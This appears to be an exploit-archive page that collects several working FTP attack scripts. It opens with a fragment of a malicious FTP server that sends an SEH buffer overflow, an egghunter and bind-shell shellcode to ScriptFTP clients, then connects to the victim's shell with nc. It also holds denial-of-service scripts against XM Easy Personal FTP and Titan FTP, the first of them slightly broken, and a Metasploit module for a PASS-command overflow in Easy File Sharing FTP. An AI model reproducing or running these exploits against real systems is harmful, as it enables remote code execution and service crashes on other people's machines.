self.log("[*] Awaiting connection...")
self.conn, addr = self.sock.accept ()
self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0])
self.put(220)
self.log("[*] Pwning in progress..")
self.log("[*] This may take up 50 seconds or less.")
while 1:
try:
data = self.get().upper()
except socket.error:
self.conn.close()
self.sock.shutdown(socket.SHUT_RDWR)
raise socket.error
if data[:4] == 'USER': s = 331
elif data[:4] == 'PASS': s = 230
elif data[:3] == 'PWD': s = 257
elif data[:4] == 'TYPE': s = 200
elif data[:4] == 'PASV':
# create passive port
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock2.bind(('', self.passive_port ))
self.sock2.listen(1)
s = self.put(227)
self.conn2, addr = self.sock2.accept()
self.passive = True
s = 0 # don't routine
elif data[:3] == 'CWD':
try:
os.chdir('..%s'%data.split(' ')[-1])
s = 250
except OSError:
s = 551
elif data[:4] == 'LIST':
s = self.put(150)
s = self.passive_do(1)
s = 0 # don't routine
print "[!] Hunter is hunting the Egg ;)"
time.sleep(50)
print "[!] Waiting for a shell.."
time.sleep(2)
print "[!] 0wn3d..!\n"
os.system("nc %s 4444"%addr[0])
sys.exit()
else:
s = 502
if s:
s = self.put(s)
def passive_do(self, id):
if id == 1:
#bind to port 4444
bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ"
"APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
"IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI"
"XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO"
"8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J"
"P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1"
"8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL"
"MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4"
"KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2"
"1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3"
"80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX"
"U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM"
"2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP"
"8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK"
"OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO"
"TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P"
"SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9"
"E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW"
"KQ7MCT2BO2JKPQCKOZ5A")
# 32bit egghunter from corelanc0d3r, thx ;)
egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
"IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
"8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
"ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
"HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
"SEYWKOYWA")
junk = "A" * 1746 #junk
nseh = "\x61\x62" #nseh
seh = "\x45\x5B" #seh ppr somewhere on scriptftp dir
#prepare for align
align = "\x60" #pushad
align += "\x73" #nop/align
align += "\x53" #push ebx
align += "\x73" #nop/align
align += "\x58" #pop eax
align += "\x73" #nop/align
align += "\x05\x02\x11" #add eax,0x11000200
align += "\x73" #nop/align
align += "\x2d\x01\x11" #sub eax,0x11000120
align += "\x73" #nop/align
#walking
walk = "\x50" #push eax
walk += "\x73" #nop/align
walk += "\xc3" #ret
#align again
align2 = "0t0t" + "\x73\x57\x73\x58\x73" #nop/push edi/nop/pop eax/nop
align2 += "\xb9\x1b\xaa" #mov ecx,0xaa001b00
align2 += "\xe8\x73" #add al,ch + nop
align2 += "\x50\x73\xc3" #push eax,nop,ret
sampah1 = "\x44" * 106 + "\x73" #eax+106/align nop
sampah2 = "\x42" * 544 #right after shellcode
crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1
res = """-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+crash+""".txt\r\ndrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 A\r\nrwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 """+ crash +".txt\r\n"
self.conn2.send(res)
# self.conn2.send('\r\n') # send blank
return res
try:
ftp_server().main()
except socket.error:
print "[!] Socket is not ready, shutting down...\n"
ScriptFTP versions 3.3 and below suffer from a buffer overflow vulnerability.
Platen/XM Easy Personal FTP 5.8 DoS ( windows)
#!/usr/bin/python
print "\n###############################################################"
print "## Iranian Pentesters Home ##"
print "## Www.Pentesters.Ir ##"
print "## PLATEN -[ H.jafari ]- ##"
print "## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##"
print "## http://www.dxm2008.com/data/ftpserversetup.exe ##"
print "## author: PLATEN ##"
print "## E-mail && blog: ##"
print "## hjafari.blogspot.com ##"
print "## platen.secure[at]gmail[dot]com ##"
print "## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##"
print "## and all members in Pentesters.ir ##"
print "############################################################### \n"
import socket
import sys
def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
subme()
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("nlst %s\r\n" %buffer)
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)
Houssam Sahli/Titan FTP Server 8.40 Denial Of Service ( na)
#!/usr/bin/python
#
# Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash
# Date: 25/11/2011
# Author: Houssam Sahli
# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe
# Version: 8.40
# Developed by : South River Technologies, Inc.
# Tested on: Windows XP SP3 French
# Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death".
# Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it.
print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"
print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f"
print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft"
print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft"
print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12"
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"
print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft"
print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12"
print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU"
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2"
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf"
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"
print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"
print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"
print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"
print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22"
print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2"
print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F"
print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf"
print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21"
print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf"
print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1"
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"
print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n"
import socket
import sys
def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 2000
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] wait for the crash...;)"
sock.send("APPE %s\r\n" %buffer)
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)
Titan FTP Server version 8.40 suffers from a denial of service condition that leads to a kernel crash.
metasploit/Easy File Sharing FTP Server 2.0 PASS Overflow ( windows)
##
# $Id: easyfilesharing_pass.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy File Sharing FTP Server 2.0 PASS Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Easy File Sharing 2.0
service. By sending an overly long password, an attacker can execute
arbitrary code.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2006-3952' ],
[ 'OSVDB', '27646' ],
[ 'BID', '19243' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ],
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
],
'DisclosureDate' => 'Jul 31 2006',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /Easy File Sharing FTP Server/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
filler = rand_text_english(2559) + "\xeb\x12"
filler << make_nops(2) + [target.ret].pack('V')
sploit = "\x2c" + filler + payload.encoded
print_status("Trying target #{target.name}...")
# needs anonymous to be set.
send_cmd(['USER', "anonymous"], true)
send_cmd(['PASS', sploit], false)
handler
disconnect
end
end